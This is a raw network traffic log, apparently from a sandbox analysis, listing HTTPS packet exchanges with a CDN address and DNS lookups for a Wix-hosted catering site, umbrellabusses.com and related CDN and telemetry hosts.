                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.179656029 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.179673910 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.179685116 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.179723024 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180262089 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180315018 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180321932 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180386066 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180435896 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180474997 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180483103 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180529118 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180562973 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180571079 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.180824995 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.181238890 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.181283951 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.181327105 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.181334972 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.181467056 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.181504011 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.181536913 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.181545973 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.181555033 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.181596041 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.182224989 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.182272911 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.182280064 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.203326941 CET4435006934.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.213593006 CET50069443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.229239941 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.229255915 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.236656904 CET4435006834.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.236754894 CET4435006834.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.236808062 CET50068443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.236825943 CET4435006834.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.236886024 CET4435006834.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.236964941 CET50068443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.237842083 CET50068443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.237855911 CET4435006834.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.240034103 CET50078443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.240062952 CET4435007834.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.240272045 CET50078443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.240494013 CET50078443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.240509987 CET4435007834.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.242002964 CET50079443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.242055893 CET4435007934.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.242130995 CET50079443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.242311001 CET50079443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.242326021 CET4435007934.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.264749050 CET4435006934.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.264853001 CET4435006934.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.264916897 CET50069443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265393972 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265433073 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265465975 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265499115 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265553951 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265563011 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265633106 CET50069443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265635014 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265651941 CET4435006934.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265683889 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265780926 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265818119 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265834093 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265842915 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265877962 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265922070 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.265930891 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266072989 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266113043 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266119957 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266166925 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266174078 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266221046 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266253948 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266263008 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266271114 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266309023 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266531944 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266602039 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266632080 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266649008 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266655922 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266701937 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266707897 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266743898 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266789913 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266819000 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266820908 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266830921 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266870022 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266876936 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266916990 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266921997 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266931057 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.266967058 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267496109 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267566919 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267600060 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267621040 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267630100 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267673969 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267716885 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267719030 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267728090 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267757893 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267788887 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267822027 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267838001 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267847061 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267887115 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267891884 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267899990 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.267945051 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.270709038 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.270759106 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.270867109 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.270916939 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.270935059 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271054029 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271099091 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271106005 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271150112 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271626949 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271703005 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271735907 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271754980 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271763086 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271805048 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271819115 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271826029 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271862984 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271867037 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271878004 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271915913 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271923065 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.271975040 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272006989 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272021055 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272030115 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272067070 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272068977 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272077084 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272124052 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272130966 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272171974 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272198915 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272207975 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272216082 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272277117 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272284031 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272327900 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272330999 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272351980 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272389889 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272397041 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272444010 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272449970 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272455931 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272500992 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272506952 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272516012 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272556067 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272566080 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272603035 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272630930 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272660017 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272674084 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272681952 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272706032 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272731066 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272783995 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272810936 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272819042 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.272876978 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.353929996 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.354001999 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.354029894 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.354063034 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.354078054 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.354096889 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.354132891 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.354134083 CET50065443192.168.2.534.49.229.81
                                                                                                                                                                                                                        Jan 10, 2025 14:53:12.354181051 CET4435006534.49.229.81192.168.2.5
                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Jan 10, 2025 14:52:32.386960983 CET192.168.2.51.1.1.10xf9d0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:32.387119055 CET192.168.2.51.1.1.10x63cdStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:34.235827923 CET192.168.2.51.1.1.10xa725Standard query (0)samantacatering.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:34.236021042 CET192.168.2.51.1.1.10x6154Standard query (0)samantacatering.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.030039072 CET192.168.2.51.1.1.10x7fa2Standard query (0)www.samantacatering.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.030183077 CET192.168.2.51.1.1.10x66fStandard query (0)www.samantacatering.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.705166101 CET192.168.2.51.1.1.10x7355Standard query (0)static.parastorage.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.705499887 CET192.168.2.51.1.1.10xa7e4Standard query (0)static.parastorage.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.706099987 CET192.168.2.51.1.1.10x91baStandard query (0)static.wixstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.706357002 CET192.168.2.51.1.1.10x88fbStandard query (0)static.wixstatic.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.740097046 CET192.168.2.51.1.1.10xe76Standard query (0)siteassets.parastorage.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.740326881 CET192.168.2.51.1.1.10x9e87Standard query (0)siteassets.parastorage.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:36.324598074 CET192.168.2.51.1.1.10xa8f9Standard query (0)frog.wix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:36.324744940 CET192.168.2.51.1.1.10x715aStandard query (0)frog.wix.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:36.325440884 CET192.168.2.51.1.1.10xa43bStandard query (0)panorama.wixapps.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:36.325659990 CET192.168.2.51.1.1.10xcaccStandard query (0)panorama.wixapps.net65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:36.522403955 CET192.168.2.51.1.1.10xb6bfStandard query (0)www.samantacatering.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:36.522643089 CET192.168.2.51.1.1.10xd43fStandard query (0)www.samantacatering.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:36.704828978 CET192.168.2.51.1.1.10xa584Standard query (0)static.parastorage.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:36.704946041 CET192.168.2.51.1.1.10xa71fStandard query (0)static.parastorage.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:50.873949051 CET192.168.2.51.1.1.10xbdedStandard query (0)umbrellabusses.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:50.874078989 CET192.168.2.51.1.1.10xbb0eStandard query (0)umbrellabusses.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:53.233561993 CET192.168.2.51.1.1.10xaf5dStandard query (0)umbrellabusses.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:53.233695030 CET192.168.2.51.1.1.10xa8ccStandard query (0)umbrellabusses.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:53:06.055027008 CET192.168.2.51.1.1.10x2bbfStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:53:06.055804968 CET192.168.2.51.1.1.10x9e93Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:53:06.407973051 CET192.168.2.51.1.1.10xa5a1Standard query (0)browser.sentry-cdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:53:06.408121109 CET192.168.2.51.1.1.10x1912Standard query (0)browser.sentry-cdn.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:53:07.246222019 CET192.168.2.51.1.1.10x6941Standard query (0)browser.sentry-cdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:53:07.246366024 CET192.168.2.51.1.1.10x34bbStandard query (0)browser.sentry-cdn.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:53:08.748267889 CET192.168.2.51.1.1.10xe392Standard query (0)sentry-next.wixpress.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:53:08.748722076 CET192.168.2.51.1.1.10x2bf1Standard query (0)sentry-next.wixpress.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:53:38.435043097 CET192.168.2.51.1.1.10x27ecStandard query (0)frog.wix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:53:38.435142040 CET192.168.2.51.1.1.10x61a7Standard query (0)frog.wix.com65IN (0x0001)false
                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                        Jan 10, 2025 14:52:32.400487900 CET1.1.1.1192.168.2.50xf9d0No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:32.403091908 CET1.1.1.1192.168.2.50x63cdNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:34.423800945 CET1.1.1.1192.168.2.50xa725No error (0)samantacatering.com185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:34.423800945 CET1.1.1.1192.168.2.50xa725No error (0)samantacatering.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:34.423800945 CET1.1.1.1192.168.2.50xa725No error (0)samantacatering.com185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.061005116 CET1.1.1.1192.168.2.50x7fa2No error (0)www.samantacatering.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.061005116 CET1.1.1.1192.168.2.50x7fa2No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.061005116 CET1.1.1.1192.168.2.50x7fa2No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.074309111 CET1.1.1.1192.168.2.50x66fNo error (0)www.samantacatering.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.074309111 CET1.1.1.1192.168.2.50x66fNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.712181091 CET1.1.1.1192.168.2.50xa7e4No error (0)static.parastorage.comstatic-external.parastorage.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.712181091 CET1.1.1.1192.168.2.50xa7e4No error (0)static-external.parastorage.comtd-static-34-49-229-81.parastorage.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.712485075 CET1.1.1.1192.168.2.50x7355No error (0)static.parastorage.comstatic-external.parastorage.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.712485075 CET1.1.1.1192.168.2.50x7355No error (0)static-external.parastorage.comtd-static-34-49-229-81.parastorage.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.712485075 CET1.1.1.1192.168.2.50x7355No error (0)td-static-34-49-229-81.parastorage.com34.49.229.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.713488102 CET1.1.1.1192.168.2.50x91baNo error (0)static.wixstatic.comd1cq301dpr7fww.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.713488102 CET1.1.1.1192.168.2.50x91baNo error (0)d1cq301dpr7fww.cloudfront.net99.86.4.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.713488102 CET1.1.1.1192.168.2.50x91baNo error (0)d1cq301dpr7fww.cloudfront.net99.86.4.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.713488102 CET1.1.1.1192.168.2.50x91baNo error (0)d1cq301dpr7fww.cloudfront.net99.86.4.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.713488102 CET1.1.1.1192.168.2.50x91baNo error (0)d1cq301dpr7fww.cloudfront.net99.86.4.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                        Jan 10, 2025 14:52:35.713854074 CET1.1.1.1192.168.2.50x88fbNo error (0)static.wixstatic.comd1cq301dpr7fww.cloudfront.netCNAME (Canonical name)IN (0x0001)false
